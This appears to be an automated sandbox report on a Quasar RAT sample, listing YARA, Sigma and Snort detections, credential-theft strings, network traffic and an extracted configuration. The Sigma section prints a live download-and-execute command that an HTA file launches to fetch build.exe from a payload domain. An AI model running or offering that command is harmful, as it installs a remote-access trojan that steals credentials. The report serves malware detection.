5.2.build.exe.1060000.2.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x4eeee:$f1: FileZilla\recentservers.xml 0x4ef2e:$f2: FileZilla\sitemanager.xml 0x4ef62:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x4e4d9:$b1: Chrome\User Data\ 0x4e53d:$b1: Chrome\User Data\ 0x4e8d0:$b2: Mozilla\Firefox\Profiles 0x4eca4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x53514:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x4ed34:$b4: Opera Software\Opera Stable\Login Data 0x4ede4:$b5: YandexBrowser\User Data\ 0x4ee56:$b5: YandexBrowser\User Data\ 0x4e684:$s4: logins.json 0x4e6d0:$s4: logins.json 0x4e9be:$s4: logins.json 0x4e1ee:$a1: username_value 0x4e20c:$a2: password_value 0x3a2af:$a3: encryptedUsername 0x3a2c5:$a3: encryptedUsername 0x3a3fb:$a3: encryptedUsername 0x3a2db:$a4: encryptedPassword 0x3a2f1:$a4: encryptedPassword
5.2.build.exe.1060000.2.unpack	MALWARE_Win_QuasarRAT	QuasarRAT payload	ditekSHen	0x3ec04:$s1: GetKeyloggerLogsResponse 0x3de5c:$s2: GetKeyloggerLogs 0x4dabe:$s3: />Log created on 0x4ec3e:$s4: User: {0}{3}Pass: {1}{3}Host: {2} 0x4e31d:$s5: Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7} 0x51cee:$s6: grabber_ 0x51d0a:$s6: grabber_ 0x3302a:$s7: <virtualKeyCode> 0x3e134:$s8: <RunHidden>k__BackingField 0x3305c:$s9: <keyboardHookStruct> 0x36405:$s10: add_OnHotKeysDown 0x36457:$s10: add_OnHotKeysDown 0x5067c:$ua1: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 0x50d39:$us2: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
5.2.build.exe.400000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
5.2.build.exe.400000.0.unpack	Windows_Trojan_Quasarrat_e52df647	unknown	unknown	0x276f9e:$a1: GetKeyloggerLogsResponse 0x2766ff:$a2: DoDownloadAndExecute 0x288bae:$a3: http://api.ipify.org/ 0x2866b7:$a4: Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7} 0x287a05:$a5: " /sc ONLOGON /tr "
5.2.build.exe.400000.0.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x2764bb:$s1: DoUploadAndExecute 0x2766ff:$s2: DoDownloadAndExecute 0x276280:$s3: DoShellExecute 0x2766b7:$s4: set_Processname 0x23ddbe:$op1: 04 1E FE 02 04 16 FE 01 60 0x23dce2:$op2: 00 17 03 1F 20 17 19 15 28 0x23e748:$op3: 00 04 03 69 91 1B 40 0x23ef98:$op3: 00 04 03 69 91 1B 40
5.2.build.exe.400000.0.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x276f9e:$x1: GetKeyloggerLogsResponse 0x2771de:$s1: DoShellExecuteResponse 0x276b4d:$s2: GetPasswordsResponse 0x2770b1:$s3: GetStartupItemsResponse 0x2764cf:$s5: RunHidden 0x2764ed:$s5: RunHidden 0x2764fb:$s5: RunHidden 0x27650f:$s5: RunHidden
5.2.build.exe.400000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x2879cb:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00 74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00 ... 0x287c01:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
5.2.build.exe.400000.0.unpack	Quasar	detect Remcos in memory	JPCERT/CC Incident Response Group	0x2873c4:$quasarstr1: [PRIVATE KEY LOCATION: "{0}"] 0x286fd8:$quasarstr2: User: {0}{3}Pass: {1}{3}Host: {2} 0x26c363:$class: Core.MouseKeyHook.WinApi
5.2.build.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x287288:$f1: FileZilla\recentservers.xml 0x2872c8:$f2: FileZilla\sitemanager.xml 0x2872fc:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x286873:$b1: Chrome\User Data\ 0x2868d7:$b1: Chrome\User Data\ 0x286c6a:$b2: Mozilla\Firefox\Profiles 0x28703e:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x28b8ae:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2870ce:$b4: Opera Software\Opera Stable\Login Data 0x28717e:$b5: YandexBrowser\User Data\ 0x2871f0:$b5: YandexBrowser\User Data\ 0x286a1e:$s4: logins.json 0x286a6a:$s4: logins.json 0x286d58:$s4: logins.json 0x286588:$a1: username_value 0x2865a6:$a2: password_value 0x272649:$a3: encryptedUsername 0x27265f:$a3: encryptedUsername 0x272795:$a3: encryptedUsername 0x272675:$a4: encryptedPassword 0x27268b:$a4: encryptedPassword
5.2.build.exe.400000.0.unpack	MALWARE_Win_QuasarRAT	QuasarRAT payload	ditekSHen	0x276f9e:$s1: GetKeyloggerLogsResponse 0x2761f6:$s2: GetKeyloggerLogs 0x285e58:$s3: />Log created on 0x286fd8:$s4: User: {0}{3}Pass: {1}{3}Host: {2} 0x2866b7:$s5: Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7} 0x28a088:$s6: grabber_ 0x28a0a4:$s6: grabber_ 0x26b3c4:$s7: <virtualKeyCode> 0x2764ce:$s8: <RunHidden>k__BackingField 0x26b3f6:$s9: <keyboardHookStruct> 0x26e79f:$s10: add_OnHotKeysDown 0x26e7f1:$s10: add_OnHotKeysDown 0x288a16:$ua1: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 0x2890d3:$us2: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
Click to see the 50 entries

Sigma Signatures

System Summary

Sigma detected: Curl Download And Execute Combination

Source: Process started

Author: Sreeman, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\build.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7456, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe, ProcessId: 7524, ProcessName: cmd.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\build.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7456, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe, ProcessId: 7524, ProcessName: cmd.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\build.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7456, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe, ProcessId: 7524, ProcessName: cmd.exe

Snort Signatures

ET TROJAN Common RAT Connectivity Check Observed - Source IP: 192.168.2.4 - Destination IP: 208.95.112.1

Timestamp:	06/09/24-01:26:38.405968
SID:	2036383
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 5.2.build.exe.64179a.1.raw.unpack

Malware Configuration Extractor: Quasar {"Host:Port": "OuB3'!fy.", "InstallName": "0vRva!b|>", "MutexName": "`H]\"':q", "StartupKey": "}p(3k<Y?Zi1BM", "Tag": "UnW))[Q>", "ServerSignature": "[{+'*", "ServerCertificate": "@ETksT"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Desktop\build.exe	ReversingLabs: Detection: 16%
Source: C:\Users\user\Desktop\build.exe	Virustotal: Detection: 19%			Perma Link

Yara detected Quasar RAT

Source: Yara match	File source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build.exe PID: 7720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 8136, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.5% probability

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\build.exe

Unpacked PE file: 5.2.build.exe.1060000.2.unpack

Source: unknown

HTTPS traffic detected: 172.67.195.64:443 -> 192.168.2.4:49733 version: TLS 1.2

Source:

Binary string: D:\Sources\foobar2000-desktop-1.6.x\foobar2000\Release\foobar2000.pdb source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2036383 ET TROJAN Common RAT Connectivity Check Observed 192.168.2.4:49746 -> 208.95.112.1:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: OuB3'!fy.

Yara detected Generic Downloader

Source: Yara match	File source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49747 -> 64.42.179.59:62604

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View	ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521

Source: unknown

DNS query: name: ip-api.com

Source: global traffic

HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /build.exe HTTP/1.1Host: mediafire.zipUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: mediafire.zip
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: roblox.airdns.org

Source: build.exe, build.exe, 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/
Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	String found in binary or memory: http://forums.foobar2000.org/
Source: build.exe, build.exe, 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://freegeoip.net/xml/
Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	String found in binary or memory: http://help.foobar2000.org/
Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	String found in binary or memory: http://help.foobar2000.org/filesystem::g_get_canonical_pathfilesystem::g_list_directoryunpack://file
Source: csc.exe, 00000009.00000002.2971577534.0000000006AAC000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2971577534.0000000006A99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: build.exe, build.exe, 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2971577534.0000000006A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/
Source: csc.exe, 00000009.00000002.2971577534.0000000006AAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: build.exe	String found in binary or memory: http://schemas.microsof
Source: csc.exe, 00000009.00000002.2971577534.0000000006A99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	String found in binary or memory: http://wiki.hydrogenaudio.org/index.php?title=Replaygain
Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	String found in binary or memory: http://wiki.hydrogenaudio.org/index.php?title=ReplaygainSet
Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	String found in binary or memory: http://www.foobar2000.org/FAQ.html
Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	String found in binary or memory: http://www.foobar2000.org/FAQ.htmlCould
Source: curl.exe, 00000004.00000002.1756910254.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, build.hta	String found in binary or memory: https://mediafire.zip/build.exe
Source: curl.exe, 00000004.00000002.1756723247.0000000002710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mediafire.zip/build.exe-obuild.exei
Source: curl.exe, 00000004.00000003.1756384519.0000000002744000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1756502997.0000000002745000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1756850133.0000000002745000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mediafire.zip/build.exem
Source: curl.exe, 00000004.00000003.1756384519.0000000002744000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1756502997.0000000002745000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1756850133.0000000002745000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mediafire.zip/build.exep
Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	String found in binary or memory: https://www.foobar2000.org/
Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	String found in binary or memory: https://www.foobar2000.org/download
Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	String found in binary or memory: https://www.foobar2000.org/downloadcomponent_manager::on_app_initPre
Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	String found in binary or memory: https://www.foobar2000.org/downloadportablestandardquietcrashednoguisafeinstallfoobar2000.exe:
Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	String found in binary or memory: https://www.foobar2000.org/license
Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	String found in binary or memory: https://www.foobar2000.org/licensehttps://www.foobar2000.org/http://forums.foobar2000.org/AboutOpens

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733

Source: unknown

HTTPS traffic detected: 172.67.195.64:443 -> 192.168.2.4:49733 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Jump to behavior

E-Banking Fraud

Yara detected Quasar RAT

Source: Yara match	File source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build.exe PID: 7720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 8136, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: QuasarRAT payload Author: ditekSHen
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: QuasarRAT payload Author: ditekSHen
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: QuasarRAT payload Author: ditekSHen
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: QuasarRAT payload Author: ditekSHen
Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: QuasarRAT payload Author: ditekSHen
Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_0041715A NtQueryDefaultLocale,	5_2_0041715A
